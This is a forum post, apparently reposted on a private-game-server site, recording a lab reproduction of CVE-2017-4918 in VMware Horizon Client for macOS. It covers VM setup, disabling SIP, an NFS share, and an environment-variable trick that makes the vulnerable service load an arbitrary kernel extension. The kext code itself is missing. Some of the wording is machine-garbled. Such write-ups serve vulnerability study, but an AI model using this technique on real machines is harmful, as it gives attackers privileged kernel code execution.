12558网页游戏私服论坛

 找回密码
 立即注册
游戏开服表 申请开服
游戏名称 游戏描述 开服状态 游戏福利 运营商 游戏链接
攻城掠地-仿官 全新玩法,觉醒武将,觉醒技能 每周新区 经典复古版本,长久稳定 进入游戏
巅峰新版攻 攻城掠地公益服 攻城掠地SF 新兵种、新武将(兵种) 进入游戏
攻城掠地公 散人玩家的天堂 新开 进入游戏
改版攻城掠 上线即可国战PK 稳定新区 全新改版,功能强大 进入游戏
少年江山 高福利高爆率 刚开一秒 江湖水落潜蛟龙 进入游戏
太古封魔录 开服送10亿钻石 福利多多 不用充钱也可升级 进入游戏
神魔之道 签到送元宝 稳定开新区 送豪华签到奖励 进入游戏
神奇三国 统帅三军,招揽名将 免费玩新区 激情国战,征战四方 进入游戏
龙符 三日豪礼领到爽 天天开新区 助你征战无双 进入游戏
王者之师 免费领豪华奖励 免费玩新区 6元送6888元宝 进入游戏
三国霸业 战车-珍宝-觉醒-攻城掠地SF-全新玩法 免费玩新区 攻城掠地私服 进入游戏
手游私服盒子 各类免费游戏 0.1折送海量资源 各类手游私服 进入游戏
皇家MU2 《奇迹 2:传奇》韩国网禅公司《奇迹》正统续作。 3D锁视角Mmrpg 暗黑3+传奇+流放之路+奇迹 进入游戏
查看: 302|回复: 0

CVE-2017-4918 复现记录

[复制链接]

345

主题

345

帖子

700

积分

实习版主

Rank: 7Rank: 7Rank: 7

积分
700
发表于 2021-7-18 18:21:03 | 显示全部楼层 |阅读模式
CVE-2017-4918 复现

一、物理机环境搭建

体系捏造机镜像:OS X 10.11 El Capitan Retail  && kali-linux-2021.1-installer-amd64
软件:VMware 15.0.3 && unlocker (用于解锁VMware对MacOS的支持)
&& VMware-Horizon-Client-4.4.0-5164329 && XCode (用于生成驱动文件)
这里建议所有捏造机全部安装英文版,避免不须要的输入法题目,中文题目。别的网络连接模式都默认选择 NAT,方便捏造机通信。
[解锁方法](mkUnlocker: 适用于vmware 15.5的解除mac限定locker (gitee.com))
留意:先解锁,才能安装MacOS捏造机。
MacOS捏造机安装教程
[kali安装教程](图文详解在VMware Workstation 14 捏造机上安装Kali Linux黑客专用体系-网络教程与技术 -亦是美网络 (yishimei.cn))
其他留意事项:
如图所示,在MacOS的安全和隐私中,先勾选Anywhere选项,这个在安装Vmtools之前会用到

禁用 SIP System Integrity Protection,雷同于Windows上的禁用驱动署名
捏造机 按下 cmd+r 键盘的同时点击重新启动,进入进入规复模式(这里的cmd在windows上对应的就是Win键)
然后选择实用工具(Utils),打开一个终端
# 禁用驱动署名csrutil disable# 重启reboot安装XCode X.X 根据你的捏造机版本确定,下面时官方汗青发布先容的链接。
Xcode Releases | xcodereleases.com
上面网页中的Requires就是体系版本要求。通常环境下AppStore里下载的都是最新版,且不符合体系要求,导致不能安装,需要留意的是安装软件必须要注册AppID苹果账号。
XCode后续用于写一个简朴的内核驱动。
2、Kali

搭建NFS文件服务器
# 安装服务apt-get install nfs-kernel-server# 创建共享文件夹mkdir /root/share# 编辑配置文件vim /etc/exports增加如下内容
/root/share *(rw,insecure)# 重启nfs服务systemctl restart nfs-kernel-server这里服务重启后,查看两台捏造机的ip地址,通过ping测试是否能互相ping通,然后右键访达(Finder),选择 Connect to Server,填入nfs://Kali的ip地址//root/share,点击连接(Connect ) 就可以看见共享文件夹了。

创建完成后可以置入如下代码到xxx.cpp文件中

点开Info.plist配置文件,点击加号,输入库的名称,后面跟上版本号。
编译后即可得到kexp.kext
将改驱动拷贝到linux下的共享目录下,紧接着在MacOS中开一个终端,导出一个环境变量。VMWARE_VIEW_USBARBITRATOR_LOG_OPTIONS
VMWARE_VIEW_USBARBITRATOR_LOG_OPTIONS="--kext /Volumes/share/kexp.kext -f"export VMWARE_VIEW_USBARBITRATOR_LOG_OPTIONSecho $VMWARE_VIEW_USBARBITRATOR_LOG_OPTIONS# 运行漏洞软件./Open\ VMware\ View\ Client\ Services# 查看驱动是否加载kextstat |grep kexp最后可以看得驱动被加载到内核

四、杂项

误删用户目录操纵
Linux误删用户家(home)目录的规复方法_rmkloveme-CSDN博客
可以先测试常规方式加载驱动,测试驱动是否存在题目。
sudo chown -R root:wheel /Users/# 检测驱动文件存在的题目kextutil -tn kexp# 加载驱动sudo kextload kexp.kext# 卸载驱动sudo kextunload kexp.kext通过Console查看体系输出日记

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
楼主热帖
回复

使用道具 举报

*滑块验证:
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|12558网页游戏私服论坛 |网站地图

GMT+8, 2024-11-24 15:44 , Processed in 0.078125 second(s), 31 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表